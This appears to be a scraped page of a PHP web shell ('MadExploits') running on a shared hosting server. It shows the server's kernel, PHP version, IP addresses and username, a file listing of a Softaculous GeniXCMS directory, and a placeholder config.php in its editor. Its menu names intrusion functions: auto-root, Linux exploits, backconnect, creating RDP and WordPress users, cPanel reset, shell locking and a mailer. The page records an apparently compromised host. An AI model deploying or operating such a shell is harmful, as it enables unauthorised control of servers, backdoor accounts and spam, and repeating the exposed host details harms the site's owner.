Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.14.135.82
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
genix /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
.htaccess
142
B
-rw-r--r--
config.php
1.19
KB
-rw-r--r--
edit.php
4.65
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
280
B
-rw-r--r--
import.php
2.97
KB
-rw-r--r--
info.xml
1.87
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
7.11
KB
-rw-r--r--
install.xml
989
B
-rw-r--r--
md5
1.9
KB
-rw-r--r--
notes.txt
106
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php if (defined('GX_LIB') === false) die("Direct Access Not Allowed!"); /** * GeniXCMS - Content Management System * * PHP Based Content Management System and Framework * * @package GeniXCMS * @since 0.0.1 build date 20140925 * @version 1.1.8 * @link https://github.com/semplon/GeniXCMS * * @author Puguh Wijayanto (www.metalgenix.com) * @copyright 2014-2020 Puguh Wijayanto * @license http://www.opensource.org/licenses/mit-license.php MIT * */error_reporting(0); // DB CONFIG define('DB_HOST', '[[softdbhost]]'); define('DB_NAME', '[[softdb]]'); define('DB_PASS', '[[softdbpass]]'); define('DB_USER', '[[softdbuser]]'); define('DB_DRIVER', 'mysqli'); define('SMART_URL', false); //set 'true' if you want use SMART URL (SEO Friendly URL) define('GX_URL_PREFIX', '.html'); define('ADMIN_DIR', 'gxadmin'); define('USE_MEMCACHED', false); define('SITE_ID', '[[SITE_ID]]'); ##################################// # DON't REMOVE or EDIT THIS. # ================================== # YOU WON'T BE ABLE TO LOG IN # IF IT CHANGED. PLEASE BE AWARE ##################################// define('SECURITY_KEY', '[[SECURITY_KEY]]'); // for security purpose, will be used for creating password
Close